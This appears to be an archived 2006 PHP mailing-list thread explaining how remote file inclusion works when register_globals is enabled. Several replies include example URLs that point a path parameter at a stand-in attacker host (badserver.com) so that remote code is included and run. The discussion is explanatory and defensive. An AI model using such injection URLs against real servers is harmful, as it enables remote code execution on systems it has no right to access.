RE: Fwd: Highjack?

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



hi tedd...

for the following url, http://www.example.com/test.php?path=abc?dummy=123

if the register_globals is on, a malicious user could potentially invoke,
http://www.example.com/badscript.php?path=http://www.badserver.com/badscript
.txt?dummy=123, which would cause the 'badscript.txt' to be used in the
original script. now, this in and of itself wouldn't cause a file on the
http server to be changed. however, if the webapp somehow caused the $path
var to be invoked or to be used in an exec() function, then whatever is in
the 'badscript.txt' file will be run as if the file is on the local system.

at this point, you're pretty much at whim of the malicious user. now, the
chance of this happening is pretty slim, unless you're using some open
source app that's unsecure, and that a user can reasonably easy find. which
is what has happened to some apps in the past.

a more potential reason for the index.php files to be changed, is that there
was some security hole, either via apache, and/or the OS for the server.

hope this helps a little bit more...



the http://www.example.com/badscript.php?could

-----Original Message-----
From: tedd [mailto:tedd@xxxxxxxxxxxx]
Sent: Tuesday, November 14, 2006 11:46 AM
To: Chris Shiflett
Cc: PHP
Subject: Re: Fwd:  Highjack?


At 1:39 PM -0500 11/14/06, Chris Shiflett wrote:
>tedd wrote:
>>  > The script will then include
>>  > http://www.badserver.com/badscript.txt?dummy=script.php
>>
>>  I still don't see how "badscript.php" can be uploaded into
>>  example.com's site in the first place
>
>PHP sends a request to badserver.com for badscript.txt, and the content
>of the response is included just as if it were the content of a local file.
>
>Hope that helps.
>
>Chris

Chris;

I'm still confused.

>At 7:12 PM +0100 11/13/06, Rory Browne wrote:
>
>If register_globals is enabled, someone could
>http://www.example.com/badscript.php?path=http://www.badserver.com/badscrip
t.txt?dummy=

If example.com is my domain, then how could evil-doer get access to
my site to place "badscript.php" there?

tedd

--
-------
http://sperling.com  http://ancientstones.com  http://earthstones.com

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


[Index of Archives]     [PHP Home]     [Apache Users]     [PHP on Windows]     [Kernel Newbies]     [PHP Install]     [PHP Classes]     [Pear]     [Postgresql]     [Postgresql PHP]     [PHP on Windows]     [PHP Database Programming]     [PHP SOAP]

  Powered by Linux